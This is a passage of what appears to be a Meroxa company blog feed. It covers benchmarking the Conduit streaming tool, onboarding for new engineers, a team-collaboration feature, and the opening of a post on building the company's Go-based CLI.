&lt;p&gt;With that, using a tool like Grafana to monitor Conduit makes a lot of sense. While we do monitor Conduit through Grafana too, it’s not how we primarily do it. Eventually, we’d like to be able to compare metrics from different test runs (e.g. to check if there were performance degradations between two releases). Comparing the results using Prometheus or Grafana cannot be done easily, so we wrote &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/blob/main/main.go&quot;&gt;a simple tool&lt;/a&gt; which will collect Conduit-specific metrics and save them to a CSV file.&lt;/p&gt;
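The idea behind that tool can be sketched in a few lines. This is a simplified illustration of turning Prometheus' text exposition format into timestamped CSV rows (the real tool linked above is written in Go, and the metric name in the example is made up):

```javascript
// Simplified sketch: convert Prometheus text-exposition lines into CSV
// rows tagged with a test name and timestamp, so results from different
// runs can be compared later. Drops HELP/TYPE comment lines.
function metricsToCsv(exposition, testName, timestamp) {
  return exposition
    .split("\n")
    .filter((line) => line.trim() && !line.startsWith("#"))
    .map((line) => {
      const i = line.lastIndexOf(" ");
      return `${testName},${timestamp},${line.slice(0, i)},${line.slice(i + 1)}`;
    });
}
```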
&lt;p&gt;When it comes to collecting data about resource usage, we are doing it in two ways. The first is instrumenting Conduit by using the &lt;a href=&quot;https://github.com/prometheus/client_golang/&quot;&gt;Prometheus client library&lt;/a&gt;, which gives us a lot of information about the internals (e.g. memory allocation, heap statistics, number of goroutines, etc.). The second is by using DataDog, which we use for the general VM stats (mostly for CPU and memory related metrics).&lt;/p&gt;
&lt;p&gt;Here’s a tip if you’re visualizing your data: implement a break between test runs. Otherwise, once test N is done, and test N+1 starts immediately after it, you might only see a fall or an increase on your graph. That can make it more difficult to correlate the test results and your graphs.&lt;/p&gt;
&lt;h2&gt;Target instance&lt;/h2&gt;
&lt;p&gt;We recommend running Conduit on an instance with 2 CPUs and 4 GB of RAM, so we’re running the tests against VMs with the same specifications.&lt;/p&gt;
&lt;p&gt;The test framework we developed can run the tests either against Conduit in Docker containers or against Conduit installed on an AWS EC2 instance (sidenote: we have a &lt;a href=&quot;https://docs.conduit.io/docs/Deploy/aws_ec2/&quot;&gt;great guide&lt;/a&gt; for launching an AWS EC2 instance and installing Conduit from scratch!).&lt;/p&gt;
&lt;p&gt;When it comes to testing on EC2 instances, here are a couple of things we’d like to share with you:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Don’t forget about them! Especially if you’re not using them very often. Otherwise, your next AWS bill may be a big surprise.&lt;/li&gt;
&lt;li&gt;Be well informed about throttling on the instance you’re using. Certain types of instances will be throttled once you run out of credits, which may affect the test results.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Data evaluation&lt;/h2&gt;
&lt;p&gt;The first step here is to actually question the data. This is especially important in cases where you’ve written some code yourself to expose certain metrics or to collect them. For example:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Have you calculated a metric correctly?&lt;/li&gt;
&lt;li&gt;Are the units correct and expected (nanoseconds vs milliseconds, megabytes vs mebibytes, etc.)?&lt;/li&gt;
&lt;li&gt;Are you able to cross check the metrics? (e.g. if a pipeline rate is shown as 100 records per second, do you actually see 6000 records in a destination after 60 seconds?)&lt;/li&gt;
&lt;li&gt;Are time zones matching? (e.g. when checking resource usage, make sure you see the same time zones in your resource graphs and your test results)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Once you are confident in your test results, you can actually start evaluating the data. Here are a few questions which may help:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;em&gt;Is the data in a test result consistent?&lt;/em&gt; If not, why not? For example, in some test results we saw that Conduit spent 100ms on a record (figures are for illustrative purposes), so you may expect a throughput of 10 records per second. However, the throughput was actually much higher. We then recalled there was some concurrent processing involved, which explained the numbers.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;What’s the relationship between a workload and the resource usage?&lt;/em&gt; Are you seeing the expected increase in resource usage when you increase the workload in a specific way? For example, in our tests with large records, we do expect the memory to go up. Or, if you have spike tests, does the resource usage go back to normal once a burst is done?&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Is there a relationship between different workloads?&lt;/em&gt;&lt;/li&gt;
&lt;/ol&gt;
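The consistency check in the first point comes down to simple arithmetic: sequential processing caps throughput at 1 / time-per-record, and concurrent processing multiplies that ceiling. A minimal sketch, where the concurrency value is whatever your pipeline actually uses:

```javascript
// Expected throughput (records/s) given time spent per record and the
// number of records processed concurrently. With 100 ms per record,
// sequential processing caps out at 10 records/s; concurrency raises that,
// which explains throughput far above the naive per-record estimate.
function expectedThroughput(timePerRecordSeconds, concurrency) {
  return concurrency / timePerRecordSeconds;
}
```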
&lt;h2&gt;Results and observations&lt;/h2&gt;
&lt;h3&gt;Large messages (4MB payloads)&lt;/h3&gt;
&lt;p&gt;By default, gRPC messages are limited to 4 MB in size. We also think that messages in data streams are much smaller than that in the majority of cases, so 4 MB payloads feel like a good upper bound to test. We have two variations of this test: one with a rate of 100 msg/s and one with a rate of 1000 msg/s.&lt;/p&gt;
&lt;p&gt;At a rate of 1000 msg/s, the throughput is around 200 msg/s. We did expect the throughput to fall short of the configured rate, but this is a gap we’re going to look into and try to improve.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/mFY-Cx3g3ZP1PJQ9fnk40AIIgJojgSud5XrjkkdaDLpAQBc0FmAC-LkiNA5DBGFgOjqGYKBNR2WUOdgfIyGTXr17w95fMa0wZ5fqjwiglWdofB1hSOxAtZqPu5H9SjxYkmr8DVpJkU06e7URCvux2NADqAGfJ1XPdVEiog6SwJmzbgZHiAwBEDv0rA&quot; alt=&quot;Graph: CPU usage for large message payloads&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/7M95og3Xl99dC7myCUf4BOVVSP3oMwbD33oMvj1ievHP07IZx-wUL8kDzL27br2VFH0n7nuBlJMOCd9AcJhJfk8aTjaHaeDMK0GVnW7DXLRCyaYVZ-Q8VmHOpN8rR2XKth3zP8B8u6AjtNvrdR_KChZ_00IMpCG4JkDTla8snIntcY14p4yI2kYfXg&quot; alt=&quot;Graph: Pipeline throughput for large message payloads&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/11f3KphTeUFsqZnyG7c2a1OZIscrN3YILvm_2AE4aTudzfbV0WFQXDxUyAl-IeMAcAJ-LzWeiGvKGxFDzXUn30pmcCRei4AFVOB_WG74UrPbadqEdcUOV9Gp2RpSiWwF_EORYQ0Q2foqBCb39HQmBHTeFBaEq-ZldnAWD18OZilCJLWPgMtlkS5XiA&quot; alt=&quot;Graph: Memory usage for large message payloads&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Small messages, high rates&lt;/h3&gt;
&lt;p&gt;We ran a few tests with message payloads which are 1 KB in size. The rates were: 10k msg/s, 15k msg/s, 20k msg/s.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generator rate (msg/s)&lt;/th&gt;
&lt;th&gt;Pipeline rate (msg/s)&lt;/th&gt;
&lt;th&gt;CPU (%)&lt;/th&gt;
&lt;th&gt;Memory usage (GB)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;10 000&lt;/td&gt;
&lt;td&gt;6 650&lt;/td&gt;
&lt;td&gt;46&lt;/td&gt;
&lt;td&gt;1.4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;15 000&lt;/td&gt;
&lt;td&gt;10 550&lt;/td&gt;
&lt;td&gt;55&lt;/td&gt;
&lt;td&gt;1.55-1.7&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20 000&lt;/td&gt;
&lt;td&gt;13 270&lt;/td&gt;
&lt;td&gt;62&lt;/td&gt;
&lt;td&gt;1.55-1.7&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;“Insane” (the generator sends records as quickly as possible)&lt;/td&gt;
&lt;td&gt;29 000&lt;/td&gt;
&lt;td&gt;77&lt;/td&gt;
&lt;td&gt;1-1.4&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;As we can see, the actual throughput is roughly 70% of the configured generator rate. We have &lt;a href=&quot;https://github.com/ConduitIO/conduit/issues/571&quot;&gt;an issue&lt;/a&gt; open to investigate this difference. We hypothesize that, at higher rates, the time it takes to produce and acknowledge a record becomes significant relative to the time the generator sleeps between records. In other words, it’s possible that, at higher rates, the generator produces fewer records than specified.&lt;/p&gt;
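&lt;p&gt;One way to see why a sleep-based generator would undershoot at high rates is a back-of-the-envelope model: if each record costs some fixed overhead on top of the configured sleep interval, that overhead is negligible at low rates but dominates at high ones. The sketch below is a hypothetical illustration of this effect, not Conduit’s actual generator code, and the 15µs overhead is an assumed value:&lt;/p&gt;

```go
package main

import "fmt"

// effectiveRate models a generator that sleeps 1/configuredRate seconds
// between records, where producing and acknowledging each record adds a
// fixed overhead. Hypothetical model for illustration only.
func effectiveRate(configuredRate, overheadSec float64) float64 {
	perRecord := 1.0/configuredRate + overheadSec
	return 1.0 / perRecord
}

func main() {
	// The same assumed 15µs of per-record overhead barely matters at
	// 100 msg/s, but costs roughly 23% of the throughput at 20,000 msg/s.
	for _, rate := range []float64{100, 1000, 20000} {
		fmt.Printf("configured %6.0f msg/s, effective %8.1f msg/s\n",
			rate, effectiveRate(rate, 15e-6))
	}
}
```

&lt;p&gt;Under these assumed numbers the effective rate at 20k msg/s lands around 15.4k msg/s, the same order of magnitude as the gap we observed.&lt;/p&gt;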
&lt;p&gt;&lt;strong&gt;Bonus workload:&lt;/strong&gt; We also have a workload where the generator sends messages as quickly as possible.&lt;/p&gt;
&lt;h3&gt;Small message bursts&lt;/h3&gt;
&lt;p&gt;In this workload, a generator produces 10 msg/s at a baseline rate, with 30-second bursts of 1000 msg/s followed by 30 seconds back at the baseline rate.&lt;/p&gt;
&lt;p&gt;The CPU usage oscillated between 0 and 10%, with exactly 60 seconds between peaks, which corresponds to the configured burst cycle (30 seconds of burst plus 30 seconds at the baseline rate).&lt;/p&gt;
&lt;h2&gt;Improvement loops&lt;/h2&gt;
&lt;p&gt;Last but not least, let the tests “soak” for a while. Running them periodically, or even frequently, will show you how to make them more efficient and easier to run, and which additional metrics you do or don’t need. Another way to improve your benchmark is to open-source it, letting others use it and suggest improvements, which is exactly what we did with &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/&quot;&gt;our streaming-benchmarks repository&lt;/a&gt;. We’re looking forward to your questions, comments, and suggestions!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Welcome to Meroxa: Your First Month at Meroxa as an Engineer]]></title><description><![CDATA[Starting a new job can feel like drinking from a firehose for the first few weeks. Meroxa has engineered the onboarding process to help create a smooth transition.]]></description><link>https://meroxa.com/blog/your-first-month-at-meroxa-as-an-engineer</link><guid isPermaLink="false">https://meroxa.com/blog/your-first-month-at-meroxa-as-an-engineer</guid><dc:creator><![CDATA[Diana Doherty]]></dc:creator><pubDate>Thu, 03 Nov 2022 12:45:07 GMT</pubDate><content:encoded>&lt;p&gt;On your first day at a company, you’re welcomed into a new team with new people, new culture, new technologies, and new code. Getting familiar with all this novelty can be overwhelming. If this new job is also remote, you’ll face additional challenges. Where office lunches and coffee runs once presented opportunities to get to know your coworkers, those opportunities are no longer built in; they need to be created.&lt;/p&gt;
&lt;p&gt;It’s important for companies to set up their new employees for long-term success. By creating a place of psychological safety, and acclimating them into company culture, new employees can prosper and feel fulfilled in their new role.&lt;/p&gt;
&lt;p&gt;At Meroxa, we onboard engineers by presenting them with a clear plan, the freedom to complete each task in their preferred timezone and working hours, and establishing a strong focus on pairing.&lt;/p&gt;
&lt;p&gt;Let’s dive deeper into what your onboarding experience could look like at Meroxa.&lt;/p&gt;
&lt;h3&gt;Before Day 1&lt;/h3&gt;
&lt;p&gt;Your onboarding process starts before your first day.&lt;/p&gt;
&lt;p&gt;Before you start, we’ll ask you to complete a questionnaire. We want to know your laptop preferences, logistical details, and more about you!&lt;/p&gt;
&lt;p&gt;Once we receive your response, we’ll:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Assign you an onboarding buddy.&lt;/li&gt;
&lt;li&gt;Create accounts and send out invites for necessary engineering and operations tooling.&lt;/li&gt;
&lt;li&gt;Provide you access to your company email, including calendar invites for the people you’ll meet on your first day!&lt;/li&gt;
&lt;li&gt;Ship you a personalized care package. We always try to find a mix of things with a personal touch and a few new things to explore! Everyone gets a set of common presents (it’ll be a surprise!), but I also got a tiramisu (my favorite dessert!) from a local bakery and an at-home ceramics kit!&lt;/li&gt;
&lt;li&gt;Ship out the laptop of your choice, from MacBooks to Linux machines.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;By tackling these tasks ahead of time, we ensure that you’re not left alone, or lost during your first day.&lt;/p&gt;
&lt;h3&gt;Day 1&lt;/h3&gt;
&lt;p&gt;On your first day, the operations team will welcome you with a personalized scrum board full of your onboarding tasks for the month. They’ll walk through your onboarding document (found in the scrum board) that will familiarize you with external services (both operations and engineering related), instruct you on how to download engineering tools, and guide you through the setup of our end-to-end dev environment locally.&lt;/p&gt;
&lt;p&gt;Next, you’ll meet your onboarding buddy! For the smoothest experience, we try to ensure your buddy:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Lives in a timezone at, or close to yours&lt;/li&gt;
&lt;li&gt;Is part of your new team, or is knowledgeable in your new domain of work&lt;/li&gt;
&lt;li&gt;Can create a safe and comfortable space for you to ask for help or ask any questions that may arise&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Your onboarding buddy is a guide and your primary point of contact as you come up to speed on all things Meroxa.&lt;/p&gt;
&lt;p&gt;As people start their work days, the #general Slack channel comes alive with pings from your new coworkers welcoming you to the team. This is the perfect opportunity to greet them and join the myriad hobby Slack channels: #cutebeasts, #art, #games, #women_at_meroxa, #home-improvement, #food, and plenty more!&lt;/p&gt;
&lt;h3&gt;Week 1&lt;/h3&gt;
&lt;p&gt;During your first week, you and your manager will set up the cadence and structure of your 1-on-1s. Your first couple of sessions are the perfect time to discuss and document your goals for the first 30/60/90 days, and align your yearly goals to Meroxa’s company values.&lt;/p&gt;
&lt;p&gt;Daily check-ins with your onboarding buddy are a time to get insights on the structure of specific repositories, more info on the engineering lifecycle, and help setting up your tools and permissions if you need them.&lt;/p&gt;
&lt;p&gt;The product team will give you a tour of our product offerings, and you’ll be meeting with other engineers for the architectural overview.&lt;/p&gt;
&lt;p&gt;By the end of the week, you should have a clearer understanding of how everything works together, and will hopefully be ready to build your first Turbine application! Turbine is a data application framework for building server-side applications that are event-driven, respond to data in real-time, and scale using cloud-native best practices. To get started with Turbine, check out our &lt;a href=&quot;https://docs.meroxa.com/turbine/get-started/&quot;&gt;getting started guide&lt;/a&gt;!&lt;/p&gt;
&lt;h3&gt;Month 1&lt;/h3&gt;
&lt;p&gt;Most of our backend components are written in Go, and our front end is JavaScript and Ember. If you are unfamiliar with any of the languages you’ll be working with, this is your time to learn! The yearly educational fund should supply the right books and courses to suit your needs. We have Slack channels for a variety of topics other people are learning, and you’re encouraged to join the discussion! Joining those channels gives you a good opportunity to connect with other learners on the same topic, along with a curated list of resources people have used in their learning journeys.&lt;/p&gt;
&lt;p&gt;Soon enough, you’ll be ready for your first ticket. Your onboarding buddy will encourage you to pair with them on this task. Once the ticket is complete, you will receive a detailed and prompt Pull Request review. Pull Requests are a great opportunity to further your knowledge about our components and best practices. Take the time to learn by observing and reviewing other PRs as well. Know that a PR’s intention should be clear, even when someone new is looking in, so if you don’t understand something, ask as a comment in the PR! If you need more help, ask your onboarding buddy to be there to review PRs with you.&lt;/p&gt;
&lt;p&gt;One of your tasks for the month is to pair at least five times with different team members. As intimidating as that might seem, it’s intended to give you a friendly introduction to our components, introduce you to more people on the team, and get accustomed to pairing when you are stuck.&lt;/p&gt;
&lt;p&gt;Another onboarding task will be to schedule 1-on-1s with people across the organization. This is a time to connect on mutual interests, and better understand their work domain.&lt;/p&gt;
&lt;h3&gt;Feedback&lt;/h3&gt;
&lt;p&gt;Our onboarding process is never complete; it is an iterative process that should always be made better for the next person. If you experience setbacks or tension at any point during onboarding, make a ticket outlining your desired changes, and if you’re up for it, tackle it!&lt;/p&gt;
&lt;p&gt;If you’re interested in Meroxa and would like to experience our onboarding process firsthand, check out our &lt;a href=&quot;https://jobs.lever.co/meroxa&quot;&gt;openings&lt;/a&gt;! We can’t wait to have our first pairing session with you! :)&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Introducing Collaboration for the Meroxa Platform]]></title><description><![CDATA[With Meroxa’s newest feature, developers can now easily invite their teammates to their account to share resources and build data applications together.]]></description><link>https://meroxa.com/blog/introducing-collaboration-for-the-meroxa-platform</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-collaboration-for-the-meroxa-platform</guid><dc:creator><![CDATA[Jennifer Hudiono]]></dc:creator><pubDate>Tue, 01 Nov 2022 18:09:36 GMT</pubDate><content:encoded>&lt;p&gt;As we navigate working in remote, hybrid, or in-office environments, collaboration continues to play an important role for teams. Collaboration enables teams to share knowledge so they can work more efficiently and effectively. Today we introduce the first step towards making Meroxa a collaborative, real-time, code-first stream processing application platform for developers.&lt;/p&gt;
&lt;p&gt;Data applications offer developers a powerful solution to work with event-driven and streaming architectures. A lone developer does not have to be encumbered by the complexity of this challenge. With Meroxa’s newest feature, developers can now easily invite their teammates to their account to share resources and build data applications together. We’re excited to take this step and see what we can build together!&lt;/p&gt;
&lt;p&gt;“Alone we can do so little; together we can do so much.” – Helen Keller&lt;/p&gt;
&lt;h2&gt;Inviting Users&lt;/h2&gt;
&lt;p&gt;To start collaborating with your teammates, sign into your &lt;a href=&quot;https://auth.meroxa.io/login?state=hKFo2SAwaXNxc1Z1c0lBRW5UakVSdVpXckdfZm5BYTlJeVdJcaFupWxvZ2luo3RpZNkgWWVsdlFqSFQ2U0dmbXRZZTlfeDBRRE9UMUxRb2szQzajY2lk2SBUeTJQeUxiZGFoNnBJcVJaaXEzdXhod0Exdmh2ZzZDNg&amp;#x26;client=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;protocol=oauth2&amp;#x26;redirect_uri=https%3A%2F%2Fdashboard.meroxa.io%2Fcallback&amp;#x26;audience=https%3A%2F%2Fapi.meroxa.io%2Fv1&amp;#x26;scope=openid+profile+email+user&amp;#x26;response_type=code&amp;#x26;response_mode=query&amp;#x26;nonce=My1BWC1hQ19PV3NRQ0s1OUxTeVBVWkpkQnM3cDBJYVhSZ2x2aDJpa3dKQg%3D%3D&amp;#x26;code_challenge=isNivbkYteLoh9DCX_LCMjirdSO4MxSMLbO6GKWumEc&amp;#x26;code_challenge_method=S256&amp;#x26;auth0Client=eyJuYW1lIjoiYXV0aDAtc3BhLWpzIiwidmVyc2lvbiI6IjEuMTQuMCJ9&amp;#x26;mode=login&quot;&gt;Meroxa account&lt;/a&gt; and click on your &lt;strong&gt;profile icon&lt;/strong&gt; and go to &lt;strong&gt;Settings&lt;/strong&gt;. Under the &lt;strong&gt;Account&lt;/strong&gt; tab, you can rename your account from the default account name given to help better identify the shared account with your teammates.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/5FEeScfZWZiukwByRgQTlSGWxhslSgXGF3EHNbwGUItst943ZLJIow2lcaHPsN_0jzYuJXI7NTlVJ0Xr1-xQU-023sHS8d5vLepSQYXfa_Trg7a7VOIw57UbP_ii2KHAeSl660GYFJVtrWj0rH1LD2_ZgYf4Oou9tHH9Qco0N4K5xcjB1XmKDxzF3Q&quot; alt=&quot;UI screenshot&quot;&gt;&lt;/p&gt;
&lt;p&gt;After setting the account name, go to the &lt;strong&gt;Users&lt;/strong&gt; tab to start inviting users to your account.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/-1jCKUgBcP1ao2UPmhPqQIT6i_PURMCCResDKenn_QtF3A0aIGOkEEPgW7RhoRvlA4FVXZUo05EIKXJz0pe-iSzkhTzwcdf6b7ou36Tu_kX_NYeLuft1viYnJGWTR75vcNVJ3mQRsVXS4J_87_eMxqPuZPkSvH9Tt14X-Fx23u_9eC8YZXuLZ2mIhw&quot; alt=&quot;UI screenshot&quot;&gt;&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;Users&lt;/strong&gt; tab is where you can easily manage all the users in the account. When a user is added, they will receive an invite email asking them to accept the invite and join your workflow. Each member of the team must have their own dedicated account, so new users to Meroxa will be directed to create an account before they can officially accept the collaboration invite. If a user already has an existing Meroxa account, they will have the option to sign in.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/065F1M4XShJGNl0aVaOKE0WwEolJ204lzdHfc1S37ZEfUcYtFk3SJYJen2QS3LxYFUQSpZoHVRTrzvMokyOeRGEtfXqp1MOx-AbDYKVzK2kYoZgjg0lxJuuTTRme8vzeMMHCvIpLo3LukkNhb4D47OXecZV3er-wMRyrDlWwNmri8E1AXyp-M5HxIw&quot; alt=&quot;UI screenshot&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Setting Accounts&lt;/h2&gt;
&lt;h3&gt;Multiple Accounts&lt;/h3&gt;
&lt;p&gt;If you have multiple accounts with Meroxa, you will be able to navigate and switch between your accounts in the dashboard and in the CLI.&lt;/p&gt;
&lt;p&gt;Note: Resources and applications belong to a specific account. They cannot be shared between accounts, so ensure you have the right account selected when creating any resources or applications.&lt;/p&gt;
&lt;p&gt;In the dashboard, you can click on your profile icon to switch between your accounts.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh3.googleusercontent.com/uMf8KH3ol5Y-awHmJ_h9GVMpNHA1I06Imo-xT4pdQecealRXNWwgVAkI6Q1LBHMCRi_8TDProt091bLWRw0a3GPi8d-s4f4Rp9ilV7KBy1I9Rty2rmmUhd8ersZnzhPWRKSSZyGwhgRs6AFRyvkwVQd_DjGy7oh7wSbygKFWXMYTwUXbH5Yo4ePvZw&quot; alt=&quot;UI screenshot&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the CLI, you can run the following command to view and set your account.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/hd_WeOim7BGaYEY-tBvwZMZr6nhNFn34P8a2T6HExhDAOpiy-lpR01tFNuJopaTxunifIFPB6jy1Lvo27iI6KYw22nJ61ITbXKAsKti0zuDVp79SKPsZrK_G-SHlhKVsHSqMicXegUDV_LDKlt9c44QQqMQ06rexfEe2Ylxvrspc_Rsry12_tK8dBw&quot; alt=&quot;Terminal screenshot&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/iyoItjlYk4iZlNF-5v10GJmc7rNMk5XV3U4cGiXYKME0m3ICFjLtDiZ0-nKXCReAu4QP_ATECTMTYyb21kWXmhIERIsIOVjSvPVKq-82jMcsAzBbua4R8wG5MqkMKRXQ9RcfADGWpkMd2IaMp4_-EHJqrwdL_zYRBDJUUYbKebmbt_FyBFiU9Sd-8w&quot; alt=&quot;terminal screenshot&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Working Together&lt;/h2&gt;
&lt;p&gt;Once a user has accepted an invite to join a collaboration workspace, they can begin collaborating in the account. At this time, all users in the account will have the same level of access across resources, applications, and settings.&lt;/p&gt;
&lt;h3&gt;Resources&lt;/h3&gt;
&lt;p&gt;Check out our &lt;a href=&quot;https://docs.meroxa.com/&quot;&gt;Resources Guide&lt;/a&gt; to learn more about available source and destination resources and how to use them in Turbine applications. You can add resources via the dashboard or the CLI. All users in the account will be able to add, edit, access, and remove resources available in the account.&lt;/p&gt;
&lt;h3&gt;Applications&lt;/h3&gt;
&lt;p&gt;Check out our &lt;a href=&quot;https://docs.meroxa.com/turbine/get-started&quot;&gt;Getting Started with Turbine Guide&lt;/a&gt; to learn more about how to initialize, develop, deploy, and release a data application using our application framework. You can initialize and deploy applications via the CLI. When you initialize a Turbine application, Meroxa scaffolds a codebase in an empty Git repository where you can develop your application. However, we encourage teams to collaborate on their application code in a shared GitHub repository accessible to your team. Through the shared repository, you can track, commit, and clone code, and deploy an application in Meroxa using our CLI within minutes.&lt;/p&gt;
&lt;p&gt;Once an application is deployed, everyone in the account will be able to view and manage that application. All users in the account can add applications, view applications deployed in the account and remove existing applications.&lt;/p&gt;
&lt;h3&gt;Settings&lt;/h3&gt;
&lt;p&gt;All users in the account will be able to access and edit the Account settings which includes the Account, Users, and Billing tabs. To access those tabs, click on your profile icon and select Account settings.&lt;/p&gt;
&lt;h2&gt;Have questions or feedback?&lt;/h2&gt;
&lt;p&gt;We are excited to take this initial step into Collaboration and will continue to build out features to enable a collaborative, real-time, code-first data application platform for developers. If you have questions or feedback, reach out directly by &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;joining our community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We can’t wait to see what you and your team build! 🚀&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[How We Built our Meroxa CLI]]></title><description><![CDATA[Building and maintaining a CLI is a daunting task if you don’t have some guidance along the way. We identified some best practices to help you.]]></description><link>https://meroxa.com/blog/how-we-built-our-meroxa-cli</link><guid isPermaLink="false">https://meroxa.com/blog/how-we-built-our-meroxa-cli</guid><dc:creator><![CDATA[Raúl Barroso]]></dc:creator><pubDate>Tue, 11 Oct 2022 16:54:21 GMT</pubDate><content:encoded>&lt;p&gt;Building a Command Line Interface (CLI) is as intimidating as trying to draw a painting in front of a blank canvas. You can feel inspired by the ones that resonate with your desired user experience, but ultimately you need to figure out some important things on your own along the way.&lt;/p&gt;
&lt;p&gt;In this blog post, based on our own experience building the &lt;a href=&quot;https://github.com/meroxa/cli&quot;&gt;Meroxa CLI&lt;/a&gt;, I’ll guide you through some important aspects to consider when either architecting a CLI from scratch or maintaining an existing one.&lt;/p&gt;
&lt;h2&gt;Why build a Command Line Interface&lt;/h2&gt;
&lt;p&gt;Our mission at Meroxa is enabling engineers to build applications with real-time data while automating repetitive operations. Although we also offer a &lt;a href=&quot;https://dashboard.meroxa.io&quot;&gt;visual interface&lt;/a&gt;, we knew that by offering a CLI we were empowering engineers to &lt;strong&gt;stay in workflow.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;By having a Command Line Interface as part of our product line-up, we’ve given our customers the ability to automate their use of our platform from the beginning, while also providing an experience that feels natural and intuitive. The best of both worlds.&lt;/p&gt;
&lt;h2&gt;Starting a CLI&lt;/h2&gt;
&lt;p&gt;Let’s start with the simplest scenario, where you get to answer the most immediate and common questions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What language will it be based on?&lt;/li&gt;
&lt;li&gt;Is there an existing framework that will make my life easier as a developer?&lt;/li&gt;
&lt;li&gt;Can I leverage existing tooling or solutions for the releasing process?&lt;/li&gt;
&lt;li&gt;How should I structure the syntax of my CLI? “noun verb” or “verb noun” 🥫🪱&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Language, framework, and tooling trifecta&lt;/h3&gt;
&lt;p&gt;Your language of choice should be based on aspects as simple as what language you know, who you expect will contribute, and how you expect your CLI will be distributed. All these factors were easy to answer at Meroxa, considering the majority of our expertise has been embodied in services written in Go, and this language shines when it comes to portability across different operating systems.&lt;/p&gt;
&lt;p&gt;Like with any other product you are building, a framework comes in handy so you can focus on developing new features rather than repeating yourself on things that are not part of your core business. For CLIs written in Go, the &lt;a href=&quot;https://github.com/spf13/cobra&quot;&gt;Cobra framework&lt;/a&gt; is the standard. It’s widely used by many &lt;a href=&quot;https://github.com/spf13/cobra/blob/main/projects_using_cobra.md&quot;&gt;developer tools&lt;/a&gt; and provides a variety of features that we knew we needed, so this seemed like a reasonable decision. On top of that, many new development tools are starting to elevate the CLI experience to another level (e.g. &lt;a href=&quot;https://charm.sh/&quot;&gt;Charm’s tools&lt;/a&gt;), so sticking with Go for our CLI seemed like a no-brainer.&lt;/p&gt;
&lt;p&gt;Frameworks are not the only type of tooling that is important to consider in the development of your CLI. To make it accessible to others, the tool you choose for releasing could affect your focus substantially. Letting distribution be managed by automated tools such as &lt;a href=&quot;https://goreleaser.com/&quot;&gt;GoReleaser&lt;/a&gt; together with &lt;a href=&quot;https://goreleaser.com/customization/homebrew/&quot;&gt;Homebrew&lt;/a&gt; is a match made in heaven, allowing you to leverage GitHub Actions to release a new version of your &lt;a href=&quot;https://github.com/meroxa/homebrew-taps/blob/master/Formula/meroxa.rb&quot;&gt;Homebrew formula&lt;/a&gt; every time a new tag is created. More about this topic below.&lt;/p&gt;
&lt;h3&gt;“noun verb”, “verb noun”, or how to make someone unhappy&lt;/h3&gt;
&lt;p&gt;Here comes the time to decide in which color you’ll paint your &lt;a href=&quot;https://en.wikipedia.org/wiki/Law_of_triviality&quot;&gt;bikeshed&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;At the time of structuring your CLI commands, you’ll hear arguments for whether you should use the “noun verb” form (e.g. &lt;code class=&quot;language-text&quot;&gt;meroxa resources list&lt;/code&gt;) or the one with “verb noun” instead (e.g.: &lt;code class=&quot;language-text&quot;&gt;meroxa list resources&lt;/code&gt;). This is probably a debate that will last until something like a search ahead autocomplete type of tool is in place on every CLI terminal out there. There’s no clear winner.&lt;/p&gt;
